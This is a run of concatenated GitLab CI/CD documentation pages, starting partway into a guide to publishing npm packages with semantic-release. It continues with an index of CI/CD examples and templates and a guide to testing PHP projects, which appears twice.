  image: node:latest
  before_script:
    - npm ci --cache .npm --prefer-offline
    - |
      {
        echo "@${CI_PROJECT_ROOT_NAMESPACE}:registry=${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/npm/"
        echo "${CI_API_V4_URL#https?}/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=\${CI_JOB_TOKEN}"
      } | tee -a .npmrc
  cache:
    key: ${CI_COMMIT_REF_SLUG}
    paths:
      - .npm/

workflow:
  rules:
    - if: $CI_COMMIT_BRANCH

variables:
  NPM_TOKEN: ${CI_JOB_TOKEN}

stages:
  - release

publish:
  stage: release
  script:
    - npm run semantic-release
  rules:
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
```

This example configures the pipeline with a single job, `publish`, which runs `semantic-release`. The semantic-release library publishes new versions of the npm package and creates new GitLab releases (if necessary). The default `before_script` generates a temporary `.npmrc` that is used to authenticate to the package registry during the `publish` job.

## Set up CI/CD variables

As part of publishing a package, semantic-release increases the version number in `package.json`. For semantic-release to commit this change and push it back to GitLab, the pipeline requires a custom CI/CD variable named `GITLAB_TOKEN`. To create this variable:

<!-- markdownlint-disable MD044 -->

1. On the left sidebar, select **Settings > Access tokens**.
1. Select **Add new token**.
1. In the **Token name** box, enter a token name.
1. Under **Select scopes**, select the **api** checkbox.
1. Select **Create project access token**.
1. Copy the token value.
1. On the left sidebar, select **Settings > CI/CD**.
1. Expand **Variables**.
1. Select **Add variable**.
1. Under **Visibility**, select **Masked**.
1. In the **Key** box, enter `GITLAB_TOKEN`.
1. In the **Value** box, enter the token value.
1. Select **Add variable**.
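To see what the pipeline's `before_script` writes to the temporary `.npmrc`, you can replay its two `echo` lines with the predefined CI/CD variables stubbed to example values. The stub values below are assumptions for illustration; GitLab sets the real ones in a job:

```shell
# Stubbed predefined variables (GitLab provides these in a real job):
CI_API_V4_URL="https://gitlab.com/api/v4"
CI_PROJECT_ID="12345"
CI_PROJECT_ROOT_NAMESPACE="gitlab-examples"

# "${CI_API_V4_URL#https?}" strips the shortest leading match of "https" plus
# one character (the colon), producing the protocol-relative URL form that npm
# expects for _authToken lines:
echo "@${CI_PROJECT_ROOT_NAMESPACE}:registry=${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/npm/"
echo "${CI_API_V4_URL#https?}/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=\${CI_JOB_TOKEN}"
```

With these stubs, the first line maps the `@gitlab-examples` scope to the project's npm endpoint, and the second attaches `${CI_JOB_TOKEN}` (left unexpanded, so npm resolves it at install time) as the auth token for that endpoint.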
<!-- markdownlint-enable MD044 -->

## Configure semantic-release

semantic-release pulls its configuration information from a `.releaserc.json` file in the project. Create a `.releaserc.json` at the root of the repository:

```json
{
  "branches": ["main"],
  "plugins": [
    "@semantic-release/commit-analyzer",
    "@semantic-release/release-notes-generator",
    "@semantic-release/gitlab",
    "@semantic-release/npm",
    [
      "@semantic-release/git",
      {
        "assets": ["package.json"],
        "message": "chore(release): ${nextRelease.version} [skip ci]\n\n${nextRelease.notes}"
      }
    ]
  ]
}
```

In the previous semantic-release configuration example, change the branch name if your project's default branch is not `main`.

## Begin publishing releases

Test the pipeline by creating a commit with a message like:

```plaintext
fix: testing patch releases
```

Push the commit to the default branch. The pipeline should create a new release (`v1.0.0`) on the project's **Releases** page and publish a new version of the package to the project's **Package registry** page.

To create a minor release, use a commit message like:

```plaintext
feat: testing minor releases
```

Or, for a breaking change:

```plaintext
feat: testing major releases

BREAKING CHANGE: This is a breaking change.
```

More information about how commit messages are mapped to releases can be found in [semantic-release's documentation](https://github.com/semantic-release/semantic-release#how-does-it-work).

## Use the module in a project

To use the published module, add an `.npmrc` file to the project that depends on the module. For example, to use [the example project](https://gitlab.com/gitlab-examples/semantic-release-npm)'s module:

```plaintext
@gitlab-examples:registry=https://gitlab.com/api/v4/packages/npm/
```

Then, install the module:

```shell
npm install --save @gitlab-examples/semantic-release-npm
```

## Troubleshooting

### Deleted Git tags reappear

A [Git tag](../../user/project/repository/tags/_index.md) deleted from the repository can sometimes be recreated by `semantic-release` when GitLab runners use a cached version of the repository. If the job runs on a runner with a cached repository that still has the tag, `semantic-release` recreates the tag in the main repository.

To avoid this behavior, you can either:

- Configure the runner with [`GIT_STRATEGY: clone`](../runners/configure_runners.md#git-strategy).
- Include the [`git fetch --prune-tags` command](https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---prune-tags) in your CI/CD script.
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: GitLab CI/CD examples
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

This page contains links to a variety of examples that can help you understand how to implement [GitLab CI/CD](../_index.md) for your specific use case.

Examples are available in several forms. As a collection of:

- `.gitlab-ci.yml` [template files](#cicd-templates) maintained in GitLab, for many common frameworks and programming languages.
- Repositories with [example projects](https://gitlab.com/gitlab-examples) for various languages. You can fork and adjust them to your own needs. Projects include an example of using [review apps with a static site served by NGINX](https://gitlab.com/gitlab-examples/review-apps-nginx/).
- Examples and [other resources](#other-resources) listed in the following sections.

## CI/CD examples

The following table lists examples with step-by-step tutorials that are contained in this section:

| Use case                      | Resource |
|-------------------------------|----------|
| Deployment with Dpl           | [Using `dpl` as deployment tool](deployment/_index.md). |
| GitLab Pages                  | See the [GitLab Pages](../../user/project/pages/_index.md) documentation for a complete example of deploying a static site. |
| Multi project pipeline        | [Build, test deploy using multi project pipeline](https://gitlab.com/gitlab-examples/upstream-project). |
| npm with semantic-release     | [Publish npm packages to the GitLab package registry using semantic-release](semantic-release.md). |
| PHP with npm, SCP             | [Running Composer and npm scripts with deployment via SCP in GitLab CI/CD](deployment/composer-npm-deploy.md). |
| PHP with PHPUnit, `atoum`     | [Testing PHP projects](php.md). |
| Secrets management with Vault | [Authenticating and Reading Secrets With HashiCorp Vault](../secrets/hashicorp_vault.md). |

### Contributed examples

You can help people that use your favorite programming language by submitting a link to a guide for that language.
These contributed guides are hosted externally or in separate example projects:

| Use case                   | Resource |
|----------------------------|----------|
| Clojure                    | [Test a Clojure application with GitLab CI/CD](https://gitlab.com/gitlab-examples/clojure-web-application). |
| Game development           | [DevOps and Game Development with GitLab CI/CD](https://gitlab.com/gitlab-examples/gitlab-game-demo/). |
| Java with Maven            | [How to deploy Maven projects to Artifactory with GitLab CI/CD](https://gitlab.com/gitlab-examples/maven/simple-maven-example). |
| Java with Spring Boot      | [Deploy a Spring Boot application to Cloud Foundry with GitLab CI/CD](https://gitlab.com/gitlab-examples/spring-gitlab-cf-deploy-demo). |
| Parallel testing Ruby & JS | [GitLab CI/CD parallel jobs testing for Ruby & JavaScript projects](https://docs.knapsackpro.com/2019/how-to-run-parallel-jobs-for-rspec-tests-on-gitlab-ci-pipeline-and-speed-up-ruby-javascript-testing). |
| Python on Heroku           | [Test and deploy a Python application with GitLab CI/CD](https://gitlab.com/gitlab-examples/python-getting-started). |
| Ruby on Heroku             | [Test and deploy a Ruby application with GitLab CI/CD](https://gitlab.com/gitlab-examples/ruby-getting-started). |
| Scala on Heroku            | [Test and deploy a Scala application to Heroku](https://gitlab.com/gitlab-examples/scala-sbt). |

## CI/CD templates

Get started with GitLab CI/CD and your favorite programming language or framework by using a `.gitlab-ci.yml` [template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates).
When you create a `.gitlab-ci.yml` file in the UI, you can choose one of these templates:

- [Android (`Android.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android.gitlab-ci.yml)
- [Android with fastlane (`Android-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android-Fastlane.gitlab-ci.yml)
- [Bash (`Bash.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Bash.gitlab-ci.yml)
- [C++ (`C++.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/C++.gitlab-ci.yml)
- [Chef (`Chef.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Chef.gitlab-ci.yml)
- [Clojure (`Clojure.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Clojure.gitlab-ci.yml)
- [Composer (`Composer.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Composer.gitlab-ci.yml)
- [Crystal (`Crystal.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Crystal.gitlab-ci.yml)
- [Dart (`Dart.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Dart.gitlab-ci.yml)
- [Django (`Django.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Django.gitlab-ci.yml)
- [Docker (`Docker.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml)
- [dotNET (`dotNET.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET.gitlab-ci.yml)
- [dotNET Core (`dotNET-Core.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET-Core.gitlab-ci.yml)
- [Elixir (`Elixir.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Elixir.gitlab-ci.yml)
- [Flutter (`Flutter.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Flutter.gitlab-ci.yml)
- [Go (`Go.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Go.gitlab-ci.yml)
- [Gradle (`Gradle.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Gradle.gitlab-ci.yml)
- [Grails (`Grails.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Grails.gitlab-ci.yml)
- [iOS with fastlane (`iOS-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/iOS-Fastlane.gitlab-ci.yml)
- [Julia (`Julia.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Julia.gitlab-ci.yml)
- [Laravel (`Laravel.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Laravel.gitlab-ci.yml)
- [LaTeX (`LaTeX.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/LaTeX.gitlab-ci.yml)
- [Maven (`Maven.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Maven.gitlab-ci.yml)
- [Mono (`Mono.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Mono.gitlab-ci.yml)
- [npm (`npm.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/npm.gitlab-ci.yml)
- [Node.js (`Nodejs.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Nodejs.gitlab-ci.yml)
- [OpenShift (`OpenShift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/OpenShift.gitlab-ci.yml)
- [Packer (`Packer.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Packer.gitlab-ci.yml)
- [PHP (`PHP.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/PHP.gitlab-ci.yml)
- [Python (`Python.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Python.gitlab-ci.yml)
- [Ruby (`Ruby.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Ruby.gitlab-ci.yml)
- [Rust (`Rust.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Rust.gitlab-ci.yml)
- [Scala (`Scala.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Scala.gitlab-ci.yml)
- [Swift (`Swift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Swift.gitlab-ci.yml)
- [Terraform (`Terraform.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.gitlab-ci.yml)
- [Terraform (`Terraform.latest.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.latest.gitlab-ci.yml)

If a programming language or framework template is not in this list, you can contribute one. To create a template, submit a merge request to [the templates list](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates).

### Adding templates to your GitLab installation

{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

You can add custom examples and templates to your instance. Your GitLab administrator can [designate an instance template repository](../../administration/settings/instance_template_repository.md) that contains examples and templates specific to your organization.

## Other resources

This section provides further resources to help you get familiar with various uses of GitLab CI/CD. Older articles and videos may not reflect the state of the latest GitLab release.
### CI/CD in the cloud

For examples of setting up GitLab CI/CD for cloud-based environments, see:

- [How to set up multi-account AWS SAM deployments with GitLab CI](https://about.gitlab.com/blog/2019/02/04/multi-account-aws-sam-deployments-with-gitlab-ci/)
- Video: [Automating Kubernetes Deployments with GitLab CI/CD](https://www.youtube.com/watch?v=wEDRfAz6_Uw)
- [How to autoscale continuous deployment with GitLab Runner on DigitalOcean](https://about.gitlab.com/blog/2018/06/19/autoscale-continuous-deployment-gitlab-runner-digital-ocean/)
- [How to create a CI/CD pipeline with Auto Deploy to Kubernetes using GitLab and Helm](https://about.gitlab.com/blog/2017/09/21/how-to-create-a-ci-cd-pipeline-with-auto-deploy-to-kubernetes-using-gitlab/)
- Video: [Demo - Deploying from GitLab to OpenShift Container Cluster](https://youtu.be/EwbhA53Jpp4)
- Tutorial: [Set up a GitLab.com Civo Kubernetes integration with Gitpod](https://gitlab.com/k33g_org/k33g_org.gitlab.io/-/issues/82)

See also the following video overviews:

- Video: [Kubernetes, GitLab, and Cloud Native](https://www.youtube.com/watch?v=d-9awBxEbvQ)
- Video: [Deploying to IBM Cloud with GitLab CI/CD](https://www.youtube.com/watch?v=6ZF4vgKMd-g)

### Customer stories

For some customer experiences with GitLab CI/CD, see:

- [How Verizon Connect reduced data center deploys from 30 days to under 8 hours with GitLab](https://about.gitlab.com/blog/2019/02/14/verizon-customer-story/)
- [How Wag! cut their release process from 40 minutes to just 6](https://about.gitlab.com/blog/2019/01/16/wag-labs-blog-post/)
- [How Jaguar Land Rover embraced CI to speed up their software lifecycle](https://about.gitlab.com/blog/2018/07/23/chris-hill-devops-enterprise-summit-talk/)

### Getting started

For some examples to help get you started, see:

- [GitLab CI/CD's 2018 highlights](https://about.gitlab.com/blog/2019/01/21/gitlab-ci-cd-features-improvements/)
- [A beginner's guide to continuous integration](https://about.gitlab.com/blog/2018/01/22/a-beginners-guide-to-continuous-integration/)

### Implementing GitLab CI/CD

For examples of others who have implemented GitLab CI/CD, see:

- [How to streamline interactions between multiple repositories with multi-project pipelines](https://about.gitlab.com/blog/2018/10/31/use-multiproject-pipelines-with-gitlab-cicd/)
- [How we used GitLab CI to build GitLab faster](https://about.gitlab.com/blog/2018/05/02/using-gitlab-ci-to-build-gitlab-faster/)
- [Test all the things in GitLab CI with Docker by example](https://about.gitlab.com/blog/2018/02/05/test-all-the-things-gitlab-ci-docker-examples/)
- [A Craftsman looks at continuous integration](https://about.gitlab.com/blog/2018/01/17/craftsman-looks-at-continuous-integration/)
- [Go tools and GitLab: How to do continuous integration like a boss](https://about.gitlab.com/blog/2017/11/27/go-tools-and-gitlab-how-to-do-continuous-integration-like-a-boss/)
- [GitBot - automating boring Git operations with CI](https://about.gitlab.com/blog/2017/11/02/automating-boring-git-operations-gitlab-ci/)
- [How to use GitLab CI for Vue.js](https://about.gitlab.com/blog/2017/09/12/vuejs-app-gitlab/)
- Video: [GitLab CI/CD Deep Dive](https://youtu.be/pBe4t1CD8Fc?t=195)
- [Dockerizing GitLab review apps](https://about.gitlab.com/blog/2017/07/11/dockerizing-review-apps/)
- [Fast and natural continuous integration with GitLab CI](https://about.gitlab.com/blog/2017/05/22/fast-and-natural-continuous-integration-with-gitlab-ci/)
- [Demo: CI/CD with GitLab in action](https://about.gitlab.com/blog/2017/03/13/ci-cd-demo/)

### Migrating to GitLab from third-party CI tools

Examples of migration to GitLab CI/CD from other tools:

- [Bamboo](../migration/bamboo.md)
- [CircleCI](../migration/circleci.md)
- [GitHub Actions](../migration/github_actions.md)
- [Jenkins](../migration/jenkins.md)
- [TeamCity](../migration/teamcity.md)

### Integrating GitLab CI/CD with other systems

To see how you can integrate GitLab CI/CD with third-party systems, see:

- [Streamline and shorten error remediation with Sentry's new GitLab integration](https://about.gitlab.com/blog/2019/01/25/sentry-integration-blog-post/)
- [How to simplify your smart home configuration with GitLab CI/CD](https://about.gitlab.com/blog/2018/08/02/using-the-gitlab-ci-slash-cd-for-smart-home-configuration-management/)
- [Demo: GitLab + Jira + Jenkins](https://about.gitlab.com/blog/2018/07/30/gitlab-workflow-with-jira-jenkins/)
- [Introducing Auto Breakfast from GitLab (sort of)](https://about.gitlab.com/blog/2018/06/29/introducing-auto-breakfast-from-gitlab/)

### Mobile development

For help with using GitLab CI/CD for mobile application development, see:

- [How to publish Android apps to the Google Play Store with GitLab and fastlane](https://about.gitlab.com/blog/2019/01/28/android-publishing-with-gitlab-and-fastlane/)
- [Setting up GitLab CI for Android projects](https://about.gitlab.com/blog/2018/10/24/setting-up-gitlab-ci-for-android-projects/)
- [Working with YAML in GitLab CI from the Android perspective](https://about.gitlab.com/blog/2017/11/20/working-with-yaml-gitlab-ci-android/)
- [How to use GitLab CI and MacStadium to build your macOS or iOS projects](https://about.gitlab.com/blog/2017/05/15/how-to-use-macstadium-and-gitlab-ci-to-build-your-macos-or-ios-projects/)
- [Setting up GitLab CI for iOS projects](https://about.gitlab.com/blog/2016/03/10/setting-up-gitlab-ci-for-ios-projects/)
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: GitLab CI/CD examples
---
---
title: Testing PHP projects
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
---

Published at <https://docs.gitlab.com/ci/php>. Source: <https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/php.md>.
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

This guide covers basic building instructions for PHP projects. Two testing scenarios are covered: using the Docker executor and using the Shell executor.

## Test PHP projects using the Docker executor

While it is possible to test PHP apps on any system, this would require manual configuration from the developer. To overcome this we use the official [PHP Docker image](https://hub.docker.com/_/php) that can be found in Docker Hub. This allows us to test PHP projects against different versions of PHP. However, not everything is plug and play; you still need to configure some things manually.

As with every job, you need to create a valid `.gitlab-ci.yml` describing the build environment.

Let's first specify the PHP image that is used for the job process. (You can read more about what an image means in the runner's lingo by reading about [Using Docker images](../docker/using_docker_images.md#what-is-an-image).)

Start by adding the image to your `.gitlab-ci.yml`:

```yaml
image: php:5.6
```

The official images are great, but they lack a few useful tools for testing. We need to first prepare the build environment. A way to overcome this is to create a script which installs all prerequisites before the actual testing is done.

Let's create a `ci/docker_install.sh` file in the root directory of our repository with the following content:

```shell
#!/bin/bash

# We need to install dependencies only for Docker
[[ ! -e /.dockerenv ]] && exit 0

set -xe

# Install git (the php image doesn't have it), which is required by composer
apt-get update -yqq
apt-get install git -yqq

# Install phpunit, the tool that we will use for testing
curl --location --output /usr/local/bin/phpunit "https://phar.phpunit.de/phpunit.phar"
chmod +x /usr/local/bin/phpunit

# Install the mysql driver
# Here you can install any other extension that you need
docker-php-ext-install pdo_mysql
```

You might wonder what `docker-php-ext-install` is. In short, it is a script provided by the official PHP Docker image that you can use to easily install extensions. For more information read [the documentation](https://hub.docker.com/_/php).

Now that we created the script that contains all prerequisites for our build environment, let's add it in `.gitlab-ci.yml`:

```yaml
before_script:
  - bash ci/docker_install.sh > /dev/null
```

As a last step, run the actual tests using `phpunit`:

```yaml
test:app:
  script:
    - phpunit --configuration phpunit_myapp.xml
```

Finally, commit your files and push them to GitLab to see your build succeeding (or failing).

The final `.gitlab-ci.yml` should look similar to this:

```yaml
default:
  # Select image from https://hub.docker.com/_/php
  image: php:5.6

  before_script:
    # Install dependencies
    - bash ci/docker_install.sh > /dev/null

test:app:
  script:
    - phpunit --configuration phpunit_myapp.xml
```

### Test against different PHP versions in Docker builds

Testing against multiple versions of PHP is super easy.
Just add another job with a different Docker image version and the runner does the rest:

```yaml
default:
  before_script:
    # Install dependencies
    - bash ci/docker_install.sh > /dev/null

# We test PHP5.6
test:5.6:
  image: php:5.6
  script:
    - phpunit --configuration phpunit_myapp.xml

# We test PHP7.0 (good luck with that)
test:7.0:
  image: php:7.0
  script:
    - phpunit --configuration phpunit_myapp.xml
```

### Custom PHP configuration in Docker builds

There are times when you need to customize your PHP environment by putting your `.ini` file into `/usr/local/etc/php/conf.d/`. For that purpose, add a `before_script` action:

```yaml
before_script:
  - cp my_php.ini /usr/local/etc/php/conf.d/test.ini
```

Of course, `my_php.ini` must be present in the root directory of your repository.

## Test PHP projects using the Shell executor

The shell executor runs your job in a terminal session on your server. To test your projects, you must first ensure that all dependencies are installed.

For example, in a VM running Debian 8, first update the cache, and then install `phpunit` and `php5-mysql`:

```shell
sudo apt-get update -y
sudo apt-get install -y phpunit php5-mysql
```

Next, add the following snippet to your `.gitlab-ci.yml`:

```yaml
test:app:
  script:
    - phpunit --configuration phpunit_myapp.xml
```

Finally, push to GitLab and let the tests begin!

### Test against different PHP versions in Shell builds

The [phpenv](https://github.com/phpenv/phpenv) project allows you to manage different versions of PHP, each with its own configuration. This is especially useful when testing PHP projects with the Shell executor.

You have to install it on your build machine under the `gitlab-runner` user following [the upstream installation guide](https://github.com/phpenv/phpenv#installation).

Using phpenv also allows you to configure the PHP environment with:

```shell
phpenv config-add my_config.ini
```

**Important note**: It seems `phpenv/phpenv` [is abandoned](https://github.com/phpenv/phpenv/issues/57).
There is a fork at [`madumlao/phpenv`](https://github.com/madumlao/phpenv) that tries to bring the project back to life. [`CHH/phpenv`](https://github.com/CHH/phpenv) also seems like a good alternative. Picking any of the mentioned tools works with the basic phpenv commands. Guiding you to choose the right phpenv is out of the scope of this tutorial.

### Install custom extensions

Because this is a pretty bare installation of the PHP environment, you may need some extensions that are not currently present on the build machine.

To install additional extensions, execute:

```shell
pecl install <extension>
```

It's not advised to add this to `.gitlab-ci.yml`. You should execute this command once, only to set up the build environment.

## Extend your tests

### Using `atoum`

Instead of PHPUnit, you can use any other tool to run unit tests. For example, you can use [`atoum`](https://github.com/atoum/atoum):

```yaml
test:atoum:
  before_script:
    - wget http://downloads.atoum.org/nightly/mageekguy.atoum.phar
  script:
    - php mageekguy.atoum.phar
```

### Using Composer

The majority of PHP projects use Composer for managing their PHP packages. To execute Composer before running your tests, add the following to your `.gitlab-ci.yml`:

```yaml
# Composer stores all downloaded packages in the vendor/ directory.
# Do not use the following if the vendor/ directory is committed to
# your git repository.
default:
  cache:
    paths:
      - vendor/

  before_script:
    # Install composer dependencies
    - wget https://composer.github.io/installer.sig -O - -q | tr -d '\n' > installer.sig
    - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
    - php -r "if (hash_file('SHA384', 'composer-setup.php') === file_get_contents('installer.sig')) { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;"
    - php composer-setup.php
    - php -r "unlink('composer-setup.php'); unlink('installer.sig');"
    - php composer.phar install
```

## Access private packages or dependencies

If your test suite needs to access a private repository, you need to configure the [SSH keys](../jobs/ssh_keys.md) to be able to clone it.

## Use databases or other services

Most of the time, you need a running database for your tests to be able to run. If you're using the Docker executor, you can leverage Docker to link to other containers. With GitLab Runner, this can be achieved by defining a `service`. This functionality is covered in [the CI services](../services/_index.md) documentation.

## Example project

We have set up an [Example PHP Project](https://gitlab.com/gitlab-examples/php) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md).

Want to hack on it? Fork it, commit, and push your changes. Within a few moments the changes are picked up by a public runner and the job begins.
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Testing PHP projects
breadcrumbs:
- doc
- ci
- examples
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

This guide covers basic building instructions for PHP projects.

Two testing scenarios are covered: using the Docker executor and using the Shell executor.

## Test PHP projects using the Docker executor

While it is possible to test PHP apps on any system, this would require manual configuration from the developer. To overcome this we use the official [PHP Docker image](https://hub.docker.com/_/php) that can be found in Docker Hub.

This allows us to test PHP projects against different versions of PHP. However, not everything is plug and play; you still need to configure some things manually.

As with every job, you need to create a valid `.gitlab-ci.yml` describing the build environment.

Let's first specify the PHP image that is used for the job process. (You can read more about what an image means in the runner's lingo in [Using Docker images](../docker/using_docker_images.md#what-is-an-image).)

Start by adding the image to your `.gitlab-ci.yml`:

```yaml
image: php:5.6
```

The official images are great, but they lack a few useful tools for testing. We need to first prepare the build environment. A way to overcome this is to create a script which installs all prerequisites prior to the actual testing.

Let's create a `ci/docker_install.sh` file in the root directory of our repository with the following content:

```shell
#!/bin/bash

# We need to install dependencies only for Docker
[[ ! -e /.dockerenv ]] && exit 0

set -xe

# Install git (the php image doesn't have it) which is required by composer
apt-get update -yqq
apt-get install git -yqq

# Install phpunit, the tool that we will use for testing
curl --location --output /usr/local/bin/phpunit "https://phar.phpunit.de/phpunit.phar"
chmod +x /usr/local/bin/phpunit

# Install mysql driver
# Here you can install any other extension that you need
docker-php-ext-install pdo_mysql
```

You might wonder what `docker-php-ext-install` is. In short, it is a script provided by the official PHP Docker image that you can use to easily install extensions. For more information read [the documentation](https://hub.docker.com/_/php).

Now that we created the script that contains all prerequisites for our build environment, let's add it in `.gitlab-ci.yml`:

```yaml
before_script:
  - bash ci/docker_install.sh > /dev/null
```

Last step, run the actual tests using `phpunit`:

```yaml
test:app:
  script:
    - phpunit --configuration phpunit_myapp.xml
```

Finally, commit your files and push them to GitLab to see your build succeeding (or failing).

The final `.gitlab-ci.yml` should look similar to this:

```yaml
default:
  # Select image from https://hub.docker.com/_/php
  image: php:5.6

  before_script:
    # Install dependencies
    - bash ci/docker_install.sh > /dev/null

test:app:
  script:
    - phpunit --configuration phpunit_myapp.xml
```

### Test against different PHP versions in Docker builds

Testing against multiple versions of PHP is super easy.
Just add another job with a different Docker image version and the runner does the rest:

```yaml
default:
  before_script:
    # Install dependencies
    - bash ci/docker_install.sh > /dev/null

# We test PHP5.6
test:5.6:
  image: php:5.6
  script:
    - phpunit --configuration phpunit_myapp.xml

# We test PHP7.0 (good luck with that)
test:7.0:
  image: php:7.0
  script:
    - phpunit --configuration phpunit_myapp.xml
```

### Custom PHP configuration in Docker builds

There are times when you need to customize your PHP environment by putting your `.ini` file into `/usr/local/etc/php/conf.d/`. For that purpose add a `before_script` action:

```yaml
before_script:
  - cp my_php.ini /usr/local/etc/php/conf.d/test.ini
```

Of course, `my_php.ini` must be present in the root directory of your repository.

## Test PHP projects using the Shell executor

The shell executor runs your job in a terminal session on your server. To test your projects, you must first ensure that all dependencies are installed.

For example, in a VM running Debian 8, first update the cache, and then install `phpunit` and `php5-mysql`:

```shell
sudo apt-get update -y
sudo apt-get install -y phpunit php5-mysql
```

Next, add the following snippet to your `.gitlab-ci.yml`:

```yaml
test:app:
  script:
    - phpunit --configuration phpunit_myapp.xml
```

Finally, push to GitLab and let the tests begin!

### Test against different PHP versions in Shell builds

The [phpenv](https://github.com/phpenv/phpenv) project allows you to manage different versions of PHP, each with its own configuration. This is especially useful when testing PHP projects with the Shell executor.

You have to install it on your build machine under the `gitlab-runner` user following [the upstream installation guide](https://github.com/phpenv/phpenv#installation).

Using phpenv also allows you to configure the PHP environment with:

```shell
phpenv config-add my_config.ini
```

**Important note**: It seems `phpenv/phpenv` [is abandoned](https://github.com/phpenv/phpenv/issues/57).
